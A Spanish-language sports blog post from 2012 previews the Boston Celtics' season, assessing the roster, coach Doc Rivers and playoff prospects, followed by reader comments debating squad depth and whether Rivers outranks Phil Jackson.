Boston Celtics: Mientras dure, dura

22 de October de 2012 por Jabho
Llevamos tiempo pronosticando el final de un ciclo y el inicio de una reconstrucción. El año pasado en este mismo espacio anunciaba que la temporada pasada sería para los Celtics “tiempo de espera” y que este verano los verdes se presentarían de nuevo a competir por el anillo…. Acerté a medias, tirando a poco. Está claro que pronosticando no me voy a ganar la vida.

La temporada pasada, tras pasar algunos apuros en las rondas iniciales de Play Offs, los Celtics jugaron un 6º partido de la final de conferencia en casa que de haber ganado hubiera mandado a la lona a Lebron y los actuales campeones. Lebron fue mucho Lebron y ni nos dio opción en ese 6º ni mucho menos en el 7º. Pero nadie, ni siquiera los Thunder finalistas, estuvo tan cerca de derrotar a los Heat.

Y no es que la temporada verde fuera un camino de rosas, ni mucho menos los Play Offs. Avery Bradley, la revelación de la temporada Celtic y ahora mismo un defensor top de la liga, no pudo jugar estas series. Ray Allen como si no las hubiera jugado y Pietrus o Hollins tuvieron muchos minutos…

Decía que acerté a medias porque hace un año esperaba para este verano a unos renovados Celtics y lo que nos encontramos es más de lo mismo… que no es poco. 

El grupo estará encabezado de nuevo por Doc Rivers, para mí el mejor entrenador de la liga. Mejor que Popo, que Adelman y que el mismísimo maestro Zen, caso de que volviera. El mejor motivando al equipo, sacando partido de cada jugador y de los mejores en el plano táctico. No dudo de la importancia de Pierce, Garnett o Rondo, pero Doc es tan importante para Boston como cualquiera de estos.

Rajon Rondo estará de nuevo al comando de las operaciones…  querido y odiado por igual. Jugador que no deja indiferente a casi nadie pero del que es incuestionable su influencia en el juego en ambos lados de la cancha. Sí, esta limitado en el tiro, pero eso al margen, pocos hay mejores en el resto de facetas del juego: defensa, rebote, manejo de balón, visión de juego…  y por si fuera poco ha demostrado tener carácter ganador y estar ahí cuando llegan los momentos calientes. A otros aún les estamos esperando en partidos cruciales de Play Offs.

A su lado saldrá de titular Courtney Lee, al menos mientras Bradley esté lesionado y yo creo que incluso aunque este vuelva. Lee es un jugador made in Boston. Muy buen defensor, buen tirador y nada egoísta… Una clara mejora sobre los Pietrus o Daniels.

Terry, Bradley y Barbosa completarán la rotación del backcourt. Terry lleva años siendo uno de los mejores 6ºs de la liga y hará un papel que a Ray le costó hacer el año pasado. Si es o no una mejora sobre el actual Sugar Ray lo veremos este año, pero una vez que allen se fue a disfrutar de sol de Florida, pocos mejores que Terry para seguir aportando anotación, defensa y saber jugar los momentos calientes. Es, además, un par de años más joven y un jugador que se ha perdido 27 partidos en 13 años de carrera.

Bradley por fin demostró el año pasado que era un jugador aprovechable. En la 2ª mitad de la temporada eclosionó  como uno de los mejores, o el mejor, defensor exterior de la liga. Capaz de ahogar al jugador que tiene el balón, es muy posible que le veamos muchos minutos de base suplente dejando minutos de escolta tanto a Terry como a Lee. Barbosa completa una rotación donde no hay un base suplente, pero si muchos jugadores que pueden conducir, defender y meter tiros.

Paul Pierce seguirá siendo el alma y alero titular de este equipo. El capi, nacido en California y que creció odiando a Bird y los suyos, verá colgado su número 34 del TD Garden cuando se retire. Ganador nato, buen defensor y referencia en ataque, especialmente en los momentos calientes… the Truth.  Con Green y Lee debería tener una regular con poco más de 30 minutos por partido. Que llegue bien a primavera es fundamental para las aspiraciones del equipo.

Tanto Lee como Green darán minutos de descanso a Pierce. Jeff Green va a ser el jugador clave para Boston. Lleva un año sin jugar y en el anterior, el tiempo que estuvo en Boston al menos, no fue importante. Pero los Celtics han confiado en él y le han firmado un buen contrato. Tiene todo el año para ponerse a punto, pero su contrato se lo ganará en Play Offs, especialmente en una teórica serie contra Lebron. Ironías de la vida Green vino a cambio de Perkins. En años pasados la capacidad de Perkins para defender a Howard o Bynum marcaba el techo de los Celtics. Que Green sea capaz de defender a Lebron o a Durant será clave para recortar una distancia que el año pasado no fue tanta. Por condiciones, debería. Porque estos Celtics, por diseño, tendrían muchos problemas para jugar contra los Lakers de Howard y Gasol, pero no tantos para defender a Lebron o Durant que en muchos momentos del año pasado jugaron de 4… Green y su evolución defensiva mediante.

Brandon Bass saldrá de 4 titular. Cuajó una sólida campaña el año pasado y se ganó a pulso su renovación. Sigue siendo pequeño para jugar de 4 y, si todo va bien, será Green quien juegue los minutos importantes en esta posición, pero debería repetir su aportación este año.

Jared Sullinger debería ser el suplente de Bass, al menos en temporada regular. No es que Rivers de muchos minutos a los rookies, pero Jared está listo para jugar y aportar 20-25 minutos de mucha calidad. Gran acierto de Ainge pescar un jugador de su categoría en el pick 21.

Kevin Garnett saldrá de center titular como ya hiciera el año pasado. Desde que llegó a Boston juega poco más de 30 minutos por partido y así seguirá. En ataque cada vez más juega lejos del aro aprovechando su tiro y su visión de juego, pero sigue siendo el líder de la mejor defensa de la liga y su carácter, como el de Rondo, Pierce o Rivers, reflejan el espíritu de estos Celtics.

Los minutos de descanso de Garnett serán para Darko Milicic en primera instancia, Fab Melo, Chris Wilcox o Jason Collins en caso de necesidad. Al rookie lo normal sería verlo en la liga de desarrollo para en años posteriores ver si puede ser una versión de Perkins. Wilcox y Jason Collins no dan para mucho más que defender y hacer faltas. Un Milicic motivado, por el contrario, puede ser muy importante para el equipo… Veremos el partido que Rivers saca de él, porque el puesto de pívot reserva se antoja como la única duda de una equilibrada plantilla y Darko parece el único capaz de ocuparlo decentemente.

Así las cosas decíamos que más de los mismo pero no es exactamente verdad. Por primera vez en años hay una rotación muy profunda y, novedad, jugadores jóvenes en ella. Los Rondo, Bradley, Lee, Green, Bass o Sullinger deben dar mucho descanso a los Pierce, Terry y Garnett sin que el balance del equipo se resienta.

Salvo sorpresa, de Boston cabe esperar los habituales problemas con el rebote, que se acaba traduciendo en ser el equipo que menos tira a canasta. Por el contra debería seguir siendo la mejor defensa de la liga. En ataque buenos tiradores, buenos pasadores, jugadores poco egoístas y jugar al son de Rondo y Pierce.

Así que aquí vengo otro año más sabiendo que estamos un peldaño por debajo de otros (Lakers, Thunder y Heat) en la carrera por el anillo, pero que hay mucho más equipo que el año pasado y como siempre, y en esto sí he acertado cada año, cuando llegue abril el que quiera ganar a los Celtics que se prepare para una serie larga y complicada… Orgullo, tradición, morir con las botas puestas… y que son muy buenos.

Altas: Courtney Lee, Leandro Barbosa, Jason Terry, Jeff Green, Darko Milicic, Jared, Sullinger, Fab Melo y Jason Collins
Bajas: Ray Allen, Ryan Hollins, Michael Pietrus, Marquis Daniels, Kenyon Dooling, JaJuan Johnson, Aleksandar Pavlovic, Greg Stiemsma y E’Twaun Moore.

Quinteto: Rajon Rondo, Courtney Lee, Paul Pierce, Brandon Bass y Kevin Garnet

Pronóstico: Por encima de 55 victorias. Finales de conferencia… mínimo.

Comenta

49 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Muy buen análisis pero lo de que Doc es mejor entrenador que Phil me relajado los esfínteres. Es un grande pero aún hay niveles

      Citar

  2. Viva_Dirk dice:
    #2

    Totalmente deacuerdo…con HisRoyal, jeje. El análisis del equipo es perfecto, pero decir que Doc es mejor que Phil es ciencia ficción, no hay ni un solo dato o hecho que apoye esa opinión.

      Citar

  3. 1899 dice:
    #3

    No os enterais ¿Como podeis decir que Phil es mejor si solo ha ganado 11 anillos como entrenador y Doc ha ganado la friolera de 1 anillo…?

      Citar

  4. Nacho dice:
    #4

    Cagüen, mira que no lo tengo muy claro, pero me pongo a tu lado Jahbo. Doc mejor que, sobre todo si éste está de relax Buss.

      Citar

  5. Nacho dice:
    #5

    mejor que Zen quería decir, claro

      Citar

  6. Esteban dice:
    #6

    muchos nombres conocidos en el banco, pero olvidate de que son una escuadra profundad

    barbosa demostro el año pasado que ya poco puede aportar, es quiza el peor defensor de la liga, en su seria contra el heat, fue el regalo para que wade se luciera, lee no esta para jugar en un equipo con aspiraciones, y sullinger, debera ponerse muy muy en forma
    hablar de profundidad cuando tus pivotes suplentes son milicic, melo, collins, es una falta de respeto

    a ver, tienen superpoblados los puestos de escolta y ala pivote, con los escoltas quieren hacere bases y con los ala pivotes, transformarlos en pivots…

    no me gusta, tienen calidad, terry, garnet, rondo, green, bass y sobretodo pierce aseguran cierto nivel, pero para llegar a otra final de conferencia, no son ellos la clave sino los complementes, en quienes no confio

      Citar

  7. Jose Luis dice:
    #7

    Contra Miami pocos pivots les hacen falta, y contra Oklahoma igual. Sólo los Lakers pueden ponerles en apuros por ahí (bueno y Sixers o Warriors, pero no son rival en las demás categorías).

    Yo creo que está muy bien la plantilla de Boston. Caer en el Este contra cualquier otro que no fuera Miami sería considerado fracaso. Ya si llegan a las finales, depende del rival, pero seguro que se considerará un éxito.

      Citar

  8. rumbero dice:
    #8

    A mi se me escapa esto de que Rondo, Terry, Pierce, Bass, Green, y Garnett no van ser la clave para llegar a finales de conferencia….Añádeles a Bradley, Lee, Milicic (y hay que ver la progresión de Sullinger) y ya tienes la rotación de 10 tios para PO. El resto pisará la pista 5 minutos para hacer sus faltas. La temporada pasada como bien dice Jabho llegaron al mismo sitio con Daniels, Dooling, Pietrus y Stiemsma. Para mi la mejora es clara. El tema será más bien que les respeten las lesiones y que Rondo no coja un catarro. Green debe ser una pieza importante y un tio del carácter de Terry puede encajar muy bien en el Garden, además que ya sabe lo que es cargarse a Miami. Espero que lleguen bien lejos que la temporada pasada nos hicieron disfrutar de lo lindo, así que como el análisis, finales de conferencia…mínimo 🙂

      Citar

  9. txusma dice:
    #9

    A Terry los Celtics le van como anillo al dedo. Le veo metiendo desde el banco 20 y tantos puntos en algún partido de playoffs.

      Citar

  10. jose antonio ramirez dice:
    #10

    ¿Que la plantilla de boston no es profunda esteban? ¡Nos hemos vuelto locos o que! Que alguien me diga desde cuando boston a tenido una plantilla tan profunda y con tantos recursos como la de este año. Quiza la del 2008 o la de la final perdida contra L.A en 2010 pero es infinitamente mejor que la del año pasado. Es que basicamente no hay color. La temporada pasada hicieron un milagro con lo poco o nada que tenian, eso no asegura que este año llegen mas lejos pero la sensacion en el ambiente es que esta peña estan preparandose para liarla muy gorda este año. Bases solo tenemos a rondo y ni necesitamos mas tampoco pero bueno, la unica carencia quiza que tenga el equipo, un base suplente que sepa dirigir cuando no este mister triple doble aka el mejorbasedelaligacondiferencia. En el exterior un bradley el chaval que no me convencia a mi pero que al final me ha ganado con su entrega y su defensa, un terry que es mas joven que ray allen y que no va a tener peores numeros que el mismo el año pasado, un barbosa que tranquilos que solo jugara cuando rivers vea oportunidad, para eso esta considerado y tiene el status de mejor entrenador de la liga por los jugadores, que al fin y al cabo son los que entieden mas de esto. Encima ponle un lee que en orlando jugo a un alto nivel, que en houston no encontro la motivacion que encontrara en boston y que es mas maduro, y en las alas poco que decir de pau the trut pierce y jeff green. Si es que yo flipo del plantillon que tenemos este año, acostumbrados a los pietrus, daniels y demas cojos que teniamos. Seguimos con los pivots? bass muy buena campaña el año pasado, ¿que fuera un espejismo? no pasa nada, tenemos al propio green o ¡cielos! a un rookie a los que nunca doc rivers da cancha pero que casualidad que con el de este año hay un jugadorazo en ciernes como sullinger. ¿Le habeis visto jugar? pura seda. Le sobran kilos, pero acaso no hay jugadores de recambio por si se tiene que poner a dieta un tiempo? llegamos a los pivots. Para mi el puesto mas debil del equipo aunque tengan muchos recambios para garnett. Esperad hombres de poca fe como rivers hace lo que parecia imposible, que milicic parezca un jugador de baloncesto, con esa envergadura tampoco es que necesitemos un super clase en la pintura, anotacion no va a faltar. Wilcox no me trasmite mucho, melo esta verde y collins es vergonzoso que un jugador tan malo lleve tantos años en la liga pero chicos, esto es boston, aqui quien no encuentra la motivacion puede salir llorando como big baby, garnett es el teniente y el garden es la mili. Por si os olvida, me a causado una grata impresion cris josehp creo que se llama, me parece un buen alero, pero con el overbooking quiza no tenga hueco. Yo lo que me pregunto es ¿ porque no han ido por un pivot tipo kenyon martin o el pajaro andersen que les viene como anillo al dedo, en vez de tener tanto pivot malo? mejor poco bueno que cantidades malas. Pero ellos lo tienen pensado asi, sera por algo…Yo les veo finalistas de la nba, intento no decirlo porque me tiren los colores, pero este año veo una motivacion en el equipo jamas vista nunca en ningun sitio. Tienen el cuchillo entre los dientes, ya lo dijo terry, quien por cierto se ha tatuado el logo de los celtics en el antebrazo; “odiamos a los heat, odiamos a los lakers” Esta gente no esta pa tonterias, esperen de ellos lo mejor.Quien espere lo peor, pobrecitro de ellos…

      Citar

  11. Denise dice:
    #11

    Pues a mi la plantilla de los Celtics me gusta y mucho; incluso me van a llover palos, pero la veo mejor que hasta la que ganó el anillo y la que luego llegaron a la final y perdieron con Lakers; lo que pasa es que andan por ahí otros equipazos como Heat, Lakers, o Thunder; pero si no hay lesiones; deberían de jugar la final del Este contra Miami a no ser que Rose volviese en plan MVP.

    Y tios, explicadme por qué la plantilla de los Celtics no es profunda, si tiene a 2 tios por puesto muy potables; cierto que la posición de Center es mejorable, pero bueno Milicic, Collins, y el Fab Melo este para repartir leña, más lo que juegue ahí Garnett acompañado por Green o Bass..

    En definitiva, no los veo zumbandose en 7 partidos a Heat, Lakers, Thunder, o Clippers, pero deberían jugar la Final del Este.

      Citar

  12. Denise dice:
    #12

    Y por cierto, con los equipos que ha tenido a lo largo de su carrera Phil Jackson, normal ….cualquier otro coach posiblemente hubiese hecho lo mismo, pero nunca ha sido tan afortunado como Jackson de caer en gracia. Me hubiera gustado verlo en los Cavs pre-Lebron, en fin, en eso Tito Phil lo comparo a Vicente del Bosque,

      Citar

  13. jose antonio ramirez dice:
    #13

    Denise:
    Pues a mi la plantilla de los Celtics me gusta y mucho; incluso me van a llover palos, pero la veo mejor que hasta la que ganó el anillo y la que luego llegaron a la final y perdieron con Lakers; lo que pasa es que andan por ahí otros equipazos como Heat, Lakers, o Thunder; pero si no hay lesiones; deberían de jugar la final del Este contra Miami a no ser que Rose volviese en plan MVP.

    Y tios, explicadme por qué la plantilla de los Celtics no es profunda, si tiene a 2 tios por puesto muy potables; cierto que la posición de Center es mejorable, pero bueno Milicic, Collins, y el Fab Melo este para repartir leña, más lo que juegue ahí Garnett acompañado por Green o Bass..

    En definitiva, no los veo zumbandose en 7 partidos a Heat, Lakers, Thunder, o Clippers, pero deberían jugar la Final del Este.

    Totalmente de acuerdo denise, si es lo que digo, que cuando ha tenido boston una plantilla tan profunda como la de este año, lo que no estoy de acuerdo es que no los veas peleandose a 7 partidos con los equipos que has citado, explicamelo ¿piensas que barrerian a estos celtics? yo no lo veo asi para nada, no me parecen tan superiores

      Citar

  14. nba dice:
    #14

    Estos Celtics , si son un equipo, por lo que los pongo al mismo nivel que Heat y Thunder.
    Ya que los Lakers ahora mismo son un conjunto de jugadores que practican el baloncesto, mas o menos, sensacion de equipo en esta pretemporada todavia no la han dado.

      Citar

  15. Sancho88 dice:
    #15

    Milicic es mierda. Wilcox debería ser la segunda opción de rotación por detrás de Garnett

      Citar

  16. Jabho dice:
    #16

    jose antonio ramirez: Totalmente de acuerdo denise, si es lo que digo, que cuando ha tenido boston una plantilla tan profunda como la de este año, lo que no estoy de acuerdo es que no los veas peleandose a 7 partidos con los equipos que has citado, explicamelo ¿piensas que barrerian a estos celtics? yo no lo veo asi para nada, no me parecen tan superiores

    La pregunta es en este ciclo cuando han perdido los Celtics en menos de 7 partidos… creo que solo hace 2 años.

    Lo de Doc sabía que no iba a ser compartido. No le quito méritos a Phill, pero me quedo con Doc al menos para esta plantilla. Cuando tengas un equipo que sea de largo mucho mejor que el resto y que tu misión sea gestionar egos ya varía, pero para estos Celtics me quedo con Doc.

      Citar

  17. jose antonio ramirez dice:
    #17

    Es curioso que a los celtics siempre dijeran que eran unos viejos, que si final de ciclo bla bla bla y este año no hablen del jeriatrico de los lakers con kobe, nash, gasol, jamison, duhon…. en fin

      Citar

  18. HisRoyalAirness dice:
    #18

    Denise:
    Y por cierto, con los equipos que ha tenido a lo largo de su carrera Phil Jackson, normal ….cualquier otro coach posiblemente hubiese hecho lo mismo, pero nunca ha sido tan afortunado como Jackson de caer en gracia. Me hubiera gustado verlo en los Cavs pre-Lebron, en fin, en eso Tito Phil lo comparo a Vicente del Bosque,

    Las plantillas de Phil Jackson ya existían antes de que él llegase, la diferencia es que no ganaban

      Citar

  19. MagicJohnson32 dice:
    #19

    Hay que ver cómo encajan las nuevas piezas pero de entrada me parece una plantilla excelente. Ainge ha hecho maravillas este verano y me parece indiscutible que ha formado un equipo muy competitivo y profundo. No espero nada de Milicic (me remito a la opinión vertida a este respecto por Sancho) pero tener un backcourt en el que Barbosa es el 5º hombre supone un lujazo, y un frontcourt con Green, Sullinger y Wilcox para rodear a los cracks… ojo. Los veo muy muy cerca del nivel de candidatos.

      Citar

  20. Esteban dice:
    #20

    Bueno, todos me piden q explique por q la plantilla no es tan profunda como parece, pues ya lo he hecho

    A ver
    No hay ni un base suplente, terry cumplira esa funcion si, pero esto no puede considerarse profundidad, q un chaval se reparta en dos posiciones significa justamente falta de profundidad

    Barbosa es un ex jugador, no vera mas de 5 min port partido en PO, descuentenlo

    Ni wilcox, ni garnett, ni sullinger, ni bass son pivots, solo milicic, collins y melo lo son y dudo q juegen mas de 5 min en po

    Es cierto, frente al heat no es necesario un pivot, para defender, pero si quieres daÑar a los campeones esa es la posicion en la q debes reforzarte
    Y en cuanto al escolta, sacando a terry, no me parecen nada ni bradley ni lee, es una mejoria al año pasado, pero knicks, nets, pacers y 76s tambien han mejorado

    La clave estara en green y rondo, el futuro y presente de este equipo

      Citar

  21. GreenPride dice:
    #21

    Mi equipo, claro está… Gran análisis Jabho.
    Vamos a ver. Primero creo que la plantilla de los Celtics es sin duda la mejor de los últimos años (2010 incluido) y sin lugar a dudas la más profunda. En el base está la clave de los Celtics. Rondo es el jugador de este equipo, él a de liderarlo y sobre todo no lesionarse para los momentos importantes ya que es el único jugador junto a Garnett que no tendría recambio posible (por otra parte como si se lesiona LeBron en Heat, Durant en OKC o Kobe en Lakers). Barbosa no me gusta pero creo que no va a tener muchos minutos por lo que el suplente de Rondo en los 10 minutos que no juega se lo repartirán entre Terry y Bradley.
    En el escolta dos jugadores excelentes defensores como Bradley y Lee para apretar las tuercas y con piernas jóvenes para seguir a Rondo en los contraataques y un jugador con experiencia y mano de seda como Jet Terry. Para mí la posición mejor cubierta con grandes jugadores a la par que complementarios. Aquí hago mención a Esteban porque si vio a Bradley en los últimos 25 partidos del año pasado y le parece que no es nada creo que tendría que volverlos a ver. Escolta intensísimo en defensa por encima del 40% en triples y fenomenal cortando hacia canasta para aprovechar las defensas sobre Garnett, Rondo y Pierce. Un jugador que este año debe dar el paso definitivo pero que ya es una realidad.
    En el alero por fin Pierce va a a tener alguien que le de minutos de descanso de calidad con Green. The Truth llevará como siempre la batuta del ataque y será el hombre a seguir en el clutch pero este año estará menos presionado para meter puntos con la cantidad de opciones que hay y debe jugar menos minutos. Green ha de ser también clave en estos Celtics. Esta llamado a ser el 3-4 suplente del equipo pero que juegue los minutos calientes. Esta ante la temporada de su vida y por lo visto en pretemporada parece que lo sabe. De su rendimiento a la hora de la verdad dependerán muchas opciones verdes.
    En el 4 a parte de Green, un tío muy sólido y que abre espacios como Bass y el pujante rookie Sulllinger. Por lo que he visto Sully puede ayudar mucho en el rebote y puede meter puntos de espaldas. Creo que esta vez Doc si le va a dar minutos a su rookie y que éste puede ser una de las sorpresas de la temporada.
    Y en el pivot el gran KG. Como está la actual NBA de 5s no veo muchos mejores que él como ya se vió en PO. Si las lesiones le respetan es la otra clave de Boston, ya que es el jugador clave en defensa y mete en vereda a todos los demás con su intensidad. Sabe que está ante sus últimas oportunidades para el anillo así que espero una gran temporada de él. Detrás veremos si Doc obra el milagro de sacar algo de Milicic lo que sería muy importante para Boston. En los Wolves tuvo unos meses buenos antes de venirse abajo y creo que la misión que tendrá en Boston de unos 20 minutos puede cumplirla bien si se motiva. Si no,Wilcox es un jugador aprovechable y Melo y Collins solo estarán para lesiones puntuales de titulares o repartir estopa.
    En general una plantilla muy mejorada respecto a la del año pasado y que creo que aspira claramente al anillo desde un segundo escalón. Para mí con la plantilla sana todo lo que no sea finales de conferencia sería un fracaso y una sorpresa. Si llegaran ahí creo que pueden tener sus opciones ante los Heat aunque veo difícil que les superen pero seguro que les harían sudar la gota gorda y nos regalarían otras series para el recuerdo como el año pasado. Sólo veo a Thunder y Heat por encima suya y por plantilla quizás a los Lakers aunque estos son una incógnita todavía.

      Citar

  22. jose antonio ramirez dice:
    #22

    Siento no darte la razon esteban, creo que te encabezonas demasiado en esa opinion pero bueno, eso es lo bonito de todo esto, que todos tenemos una opinion distinta y ninguno sabemos nada al fin y al cabo. Tanto terry como bradley como lee pueden hacer un papel de base puntual, y lo que para ti no es profundidad, en este caso y debido a tanto bueno jugador, yo lo llamo versatilidad. Barbosa siendo el 5 hoombre de el backcourt no esta nada mal. En cuanto a los pivots ya dije que preferia poco bueno a mucho de malo pero pensemos que no son los que tienen que marcar la diferencia en el equipo, para eso ya estan otros muchos. Haran el trabajo sucio, rebotes, faltas y descanso, yo personalmente la apuesta de milicic tengo esperanza de que salga bien con rivers y garnett de por medio. Coincido totalmente que la clave este año es green. Y que no se nos olvide que ahora son piernas jovenes, que la plantiilla llegara mas fresca a abril, sobre todo para los que ahi tienen que marcar la diferencia. No se, a mi me parece un plantillon, mucho mas mejorada que cualquier equipo que as puesto y sobre todo con una cosa que los demas no tienen para desbancar a miami, caracter ganador y orgullo y los cojones necesarios para ello. No te ofendas esteban, suelo coincidir contigo muchas veces que opinas pero en este caso no

      Citar

  23. jose antonio ramirez dice:
    #23

    GreenPride:
    Mi equipo, claro está… Gran análisis Jabho.
    Vamos a ver. Primero creo que la plantilla de los Celtics es sin duda la mejor de los últimos años (2010 incluido) y sin lugar a dudas la más profunda. En el base está la clave de los Celtics. Rondo es el jugador de este equipo, él a de liderarlo y sobre todo no lesionarse para los momentos importantes ya que es el único jugador junto a Garnett que no tendría recambio posible (por otra parte como si se lesiona LeBron en Heat, Durant en OKC o Kobe en Lakers). Barbosa no me gusta pero creo que no va a tener muchos minutos por lo que el suplente de Rondo en los 10 minutos que no juega se lo repartirán entre Terry y Bradley.
    En el escolta dos jugadores excelentes defensores como Bradley y Lee para apretar las tuercas y con piernas jóvenes para seguir a Rondo en los contraataques y un jugador con experiencia y mano de seda como Jet Terry. Para mí la posición mejor cubierta con grandes jugadores a la par que complementarios. Aquí hago mención a Esteban porque si vio a Bradley en los últimos 25 partidos del año pasado y le parece que no es nada creo que tendría que volverlos a ver. Escolta intensísimo en defensa por encima del 40% en triples y fenomenal cortando hacia canasta para aprovechar las defensas sobre Garnett, Rondo y Pierce. Un jugador que este año debe dar el paso definitivo pero que ya es una realidad.
    En el alero por fin Pierce va a a tener alguien que le de minutos de descanso de calidad con Green. The Truth llevará como siempre la batuta del ataque y será el hombre a seguir en el clutch pero este año estará menos presionado para meter puntos con la cantidad de opciones que hay y debe jugar menos minutos. Green ha de ser también clave en estos Celtics. Esta llamado a ser el 3-4 suplente del equipo pero que juegue los minutos calientes. Esta ante la temporada de su vida y por lo visto en pretemporada parece que lo sabe. De su rendimiento a la hora de la verdad dependerán muchas opciones verdes.
    En el 4 a parte de Green, un tío muy sólido y que abre espacios como Bass y el pujante rookie Sulllinger. Por lo que he visto Sully puede ayudar mucho en el rebote y puede meter puntos de espaldas. Creo que esta vez Doc si le va a dar minutos a su rookie y que éste puede ser una de las sorpresas de la temporada.
    Y en el pivot el gran KG. Como está la actual NBA de 5s no veo muchos mejores que él como ya se vió en PO. Si las lesiones le respetan es la otra clave de Boston, ya que es el jugador clave en defensa y mete en vereda a todos los demás con su intensidad. Sabe que está ante sus últimas oportunidades para el anillo así que espero una gran temporada de él. Detrás veremos si Doc obra el milagro de sacar algo de Milicic lo que sería muy importante para Boston. En los Wolves tuvo unos meses buenos antes de venirse abajo y creo que la misión que tendrá en Boston de unos 20 minutos puede cumplirla bien si se motiva. Si no,Wilcox es un jugador aprovechable y Melo y Collins solo estarán para lesiones puntuales de titulares o repartir estopa.
    En general una plantilla muy mejorada respecto a la del año pasado y que creo que aspira claramente al anillo desde un segundo escalón. Para mí con la plantilla sana todo lo que no sea finales de conferencia sería un fracaso y una sorpresa. Si llegaran ahí creo que pueden tener sus opciones ante los Heat aunque veo difícil que les superen pero seguro que les harían sudar la gota gorda y nos regalarían otras series para el recuerdo como el año pasado. Sólo veo a Thunder y Heat por encima suya y por plantilla quizás a los Lakers aunque estos son una incógnita todavía.

    Muy contento de volver a verte de nuevo por aqui tio, este año nos esperan cosas muy buenas con nuestro equipo, go celtics¡¡

      Citar

  24. GreenPride dice:
    #24

    Y que lo digas jose antonio, es un año ilusionante para los aficionados verdes. Espero unos Celtics ultra-presionantes en defensa y con más opciones en ataque. Veremos si Rondo ha mejorado su tiro.
    Por cierto en mi comentario se me olvidó hablar de Doc Rivers. Para mí el mejor entrenador de ahora mismo y sí para mí mejor que Phil Jackson. Ya sé que el del Zen tiene 11 anillos y eso es una garantía de su valía pero creo que Rivers es mejor leyendo los partidos y preparando jugadas puntuales. Un gran estratega que este año tiene mucho trabajo para acoplar este equipo y dar valía a todos los jugadores que tiene.

      Citar

  25. Ruxixón dice:
    #25

    Pues yo que creo que Milicic hará una notable temporada..jaja,el serbio está pirado pero los aires de Boston no sé qué tienen que convierten a todos en jugadores que reman todas a una y no creo que Milicic sea una excepción.Una plantilla llena de perros de presa y con la calidad y el espiritú de siempre,los veo mejor que nunca.Probablemente mi única duda viene por Jeff Green,tras una temporada parado a ver qué nivel da saliendo como rotación del 3/4.

      Citar

  26. Viva_Dirk dice:
    #26

    HisRoyalAirness: Las plantillas de Phil Jackson ya existían antes de que él llegase, la diferencia es que no ganaban

    Bingo!

      Citar

  27. Lanegan dice:
    #27

    Yo creo que si es una plantilla profunda, pero también es cierto que algo desequilibrada. Ni hay un sustituto natural para Rondo ni tampoco un pivot titular. Sin embargo la profundidad en los puestos de SG y PF es admirable y se usará para cubrir las otras carencias. Bradley dará descanso a Rondo, y KG partirá como pivot titular. El equipo a mejorado mucho con respecto al año pasado (asumiendo, claro, que Pierce y KG mantengan el mismo nivel). Las opciones ofensivas se han multiplicado: la suma de Lee y Jet mejora lo que actualmente ofrecía Allen, Green ofrece una amplia gama de recursos tanto de 3 como de 4, Sullinger me recuerda a Scola (poco atlético pero con magníficos fundamentos en el poste) y está listo para aportar desde ya. Se puede armar una magnífica rotación de 9-10 jugadores sin que suponga una bajón en el juego (y quedan 3 o 4 más que pueden cumplir roles secundarios de forma muy efectiva). Si se consigue implicar a todos los nuevos en el gran sistema defensivo verde y llegan sanos a playoffs aspiran a todo.

      Citar

  28. HisRoyalAirness dice:
    #28

    GreenPride:
    Y que lo digas jose antonio, es un año ilusionante para los aficionados verdes. Espero unos Celtics ultra-presionantes en defensa y con más opciones en ataque. Veremos si Rondo ha mejorado su tiro.
    Por cierto en mi comentario se me olvidó hablar de Doc Rivers. Para mí el mejor entrenador de ahora mismo y sí para mí mejor que Phil Jackson. Ya sé que el del Zen tiene 11 anillos y eso es una garantía de su valía pero creo que Rivers es mejor leyendo los partidos y preparando jugadas puntuales. Un gran estratega que este año tiene mucho trabajo para acoplar este equipo y dar valía a todos los jugadores que tiene.

    Yo no pretengo desmerecer a Doc Rivers, para mí el mejor entrenador en match time ACTUALMENTE.

    Leer los partidos y jugadas puntuales? Me voy a remitir exclusivamente a esto:

      Citar

  29. TheDeerHunter dice:
    #29

    como odio esa jugada

      Citar

  30. nba dice:
    #30

    Hombre Deer algun tipo de merito tiene que tener tio Phil, aparte de haber entrenado a autenticas leyendas de la nba, lo que es evidentemente que de los que entrenan ahora mismo Doc Rivers cuenta con el mejor ecosistema para desempeñar su tarea.

      Citar

  31. AndiD dice:
    #31

    HisRoyalAirness: Leer los partidos y jugadas puntuales? Me voy a remitir exclusivamente a esto:

    http://www.youtube.com/watch?v=GnAr4I3-Z48

    Con la de veces que habré visto esa jugada y no me había fijado en el loco BJ Armstrong en el minuto 1:25… pero qué hace el tío?!?!?

    Y +1 para HisRoyal por el comentario de las plantillas de Phil.
    Es verdad que el mejor no es siempre el que más ha ganado, pero 11 a 1…

      Citar

  32. Esteban dice:
    #32

    igualmente, tambien debo decir, que si bien no me emocionan, tienen un buen equipo, aunque dudo que puedan con el HEAT, entre otros

    un buen equipo, lastra la renovacion inmediata, duele decirlo, pero ya no estan para campeones, y a la vez tienen mimbres para ser contendientes pronto si se hubiesen movido bien y no me parece

    era el momento para dar un paso atras sin volver la vista y olvidarse de sus heroes

    una base con RONDO, GREEN, SULLINGER, BASS y BRADLEY, teniendo en cuenta lo poco q cobran estos muchachos, podrian sumar algun ALL-STAR y ser contendientes

      Citar

  33. Esteban dice:
    #33

    ah me falto PIERCE, aunque no le quede mucho tiempo como joven

      Citar

  34. HisRoyalAirness dice:
    #34

    TheDeerHunter:
    como odio esa jugada

    Por qué Deer?

      Citar

  35. GreenPride dice:
    #35

    HisRoyalAirness: http://www.youtube.com/watch?v=GnAr4I3-Z48

    Hombre HisRoyal yo digo que para mí Doc es mejor que el maestro Zen pero esto no quiere decir que el gran Phil sea un zoquete estilo Mike Brown. Es un fenomenal entrenador pero creo que Doc es un pelín mejor leyendo los partidos que el gran Phil. Gran lanzamiento de Paxson en ese vídeo y muy buena jugada diseñada por Phil, que por cierto el propio Paxson reconoció que MJ le dijo: “Si me sobremarcan preparáte para lanzar porque te pasaré el balón”.

      Citar

  36. GreenPride dice:
    #36

    Hombre HisRoyal yo digo que para mí Doc es mejor que el maestro Zen pero esto no quiere decir que el gran Phil sea un zoquete estilo Mike Brown. Es un fenomenal entrenador pero creo que Doc es un pelín mejor leyendo los partidos que el gran Phil. Gran lanzamiento de Paxson en ese vídeo y muy buena jugada diseñada por Phil, que por cierto el propio Paxson reconoció que MJ le dijo: “Si me sobremarcan preparáte para lanzar porque te pasaré el balón”.

      Citar

  37. TheDeerHunter dice:
    #37

    HisRoyalAirness: Por qué Deer?

    Es personal. A mí me jodió mucho.

      Citar

